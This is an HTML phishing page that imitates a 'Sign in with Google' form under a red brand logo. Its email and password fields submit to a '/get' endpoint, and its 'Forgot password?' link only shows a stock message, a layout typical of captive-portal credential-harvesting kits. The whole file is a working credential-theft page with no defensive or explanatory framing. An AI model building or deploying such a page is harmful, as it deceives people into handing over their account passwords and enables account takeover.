<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #E41512;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #E41512;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #E41512;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
    display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #E41512;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="100.000000pt" height="113.000000pt" viewBox="0 0 1000.000000 1139.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,1139.000000) scale(0.100000,-0.100000)"
fill="#E41512" stroke="none">
<path d="M6825 11378 c-2 -7 -237 -751 -520 -1653 -284 -902 -520 -1644 -524
-1648 -4 -4 -205 296 -445 668 -241 371 -441 673 -445 670 -5 -2 -187 -315
-407 -696 -372 -646 -399 -689 -408 -662 -5 15 -195 610 -421 1321 -227 711
-415 1295 -418 1298 -5 5 -3226 -1222 -3237 -1233 -3 -3 22 -55 54 -116 747
-1412 1370 -2698 1876 -3872 241 -559 471 -1134 650 -1625 91 -249 300 -873
300 -896 0 -8 2 -14 4 -14 2 0 338 -68 746 -150 408 -83 750 -150 759 -150 11
0 115 183 341 600 179 330 327 600 330 600 3 0 196 -291 430 -645 234 -355
429 -645 435 -645 27 -1 2026 131 2063 136 24 3 45 11 47 17 2 7 29 156 60
332 118 667 346 1779 525 2566 390 1706 805 3231 1262 4637 75 227 118 376
112 381 -10 9 -3120 791 -3148 791 -9 0 -19 -6 -21 -12z"/>
<path d="M9453 2387 l-482 -152 -15 -80 c-24 -131 -50 -354 -43 -362 6 -6 897
92 902 100 1 1 30 137 64 302 34 165 65 310 68 323 3 12 1 22 -3 21 -5 0 -226
-69 -491 -152z"/>
<path d="M1766 2098 c-76 -238 -142 -437 -146 -441 -4 -4 -59 72 -122 170 -63
97 -119 178 -125 180 -5 2 -53 -72 -106 -164 -53 -93 -102 -176 -110 -186 -12
-17 -26 23 -129 345 -63 199 -120 363 -124 363 -25 0 -904 -342 -904 -351 0
-7 39 -85 87 -175 153 -291 357 -722 488 -1034 86 -203 105 -253 175 -455 l58
-165 208 -42 c115 -23 212 -42 216 -43 3 0 33 51 66 113 34 61 74 136 90 166
l30 54 118 -177 117 -176 56 1 c31 0 166 8 300 17 l245 17 38 205 c113 604
301 1353 472 1885 25 77 44 140 43 140 -1 1 -200 41 -442 90 -242 48 -444 89
-450 91 -5 2 -72 -191 -149 -428z"/>
<path d="M3101 2231 c-61 -156 -244 -784 -341 -1166 -82 -326 -200 -872 -200
-930 0 -10 677 19 687 29 3 2 14 40 24 83 11 43 25 95 30 116 l10 37 257 0
257 0 31 -108 31 -107 59 1 c520 12 684 17 684 23 0 9 -667 1891 -671 1895 -2
2 -175 34 -384 71 -209 37 -399 70 -422 74 -39 8 -42 6 -52 -18z m492 -887
c14 -79 75 -350 102 -456 l7 -28 -131 0 c-102 0 -131 3 -131 13 0 7 20 103 44
213 24 109 52 234 61 277 9 42 20 77 24 77 4 0 15 -43 24 -96z"/>
<path d="M8045 2160 c-49 -5 -276 -23 -502 -41 l-413 -33 0 -938 0 -938 23 -4
c12 -3 207 -22 432 -42 592 -54 710 -50 866 32 166 87 258 263 259 492 0 239
-106 446 -268 521 -56 26 -63 36 -32 46 34 11 117 99 145 154 57 114 83 277
66 419 -21 173 -71 257 -183 307 -56 25 -76 29 -183 31 -66 1 -160 -1 -210 -6z
m-69 -483 c23 -20 28 -34 31 -83 7 -110 -51 -166 -185 -180 l-62 -7 0 141 0
141 33 4 c17 2 60 5 94 5 52 2 66 -2 89 -21z m33 -732 c76 -45 101 -134 59
-214 -34 -65 -76 -83 -204 -89 l-104 -5 0 168 0 167 108 -3 c84 -3 114 -8 141
-24z"/>
<path d="M6525 2055 c-165 -13 -301 -23 -302 -24 -2 -1 -3 -84 -3 -186 l0
-185 334 0 333 0 6 68 c4 37 7 131 7 210 l0 142 -37 -1 c-21 -1 -173 -12 -338
-24z"/>
<path d="M4770 1125 l0 -915 610 0 610 0 0 295 0 295 -275 0 -275 0 0 620 0
620 -335 0 -335 0 0 -915z"/>
<path d="M9300 1707 c-223 -22 -406 -41 -407 -41 -3 -2 -34 -385 -48 -606 -17
-264 -38 -931 -30 -952 4 -10 107 -27 373 -61 202 -26 377 -47 389 -47 20 0
21 6 28 108 30 475 98 1096 165 1493 11 64 20 124 20 133 0 22 -7 21 -490 -27z"/>
<path d="M6220 855 l0 -655 335 0 335 0 0 655 0 655 -335 0 -335 0 0 -655z"/>
</g>
</svg>



  </div>

  <div class="form-container">

    <center><h1>Sign in with <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot password?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
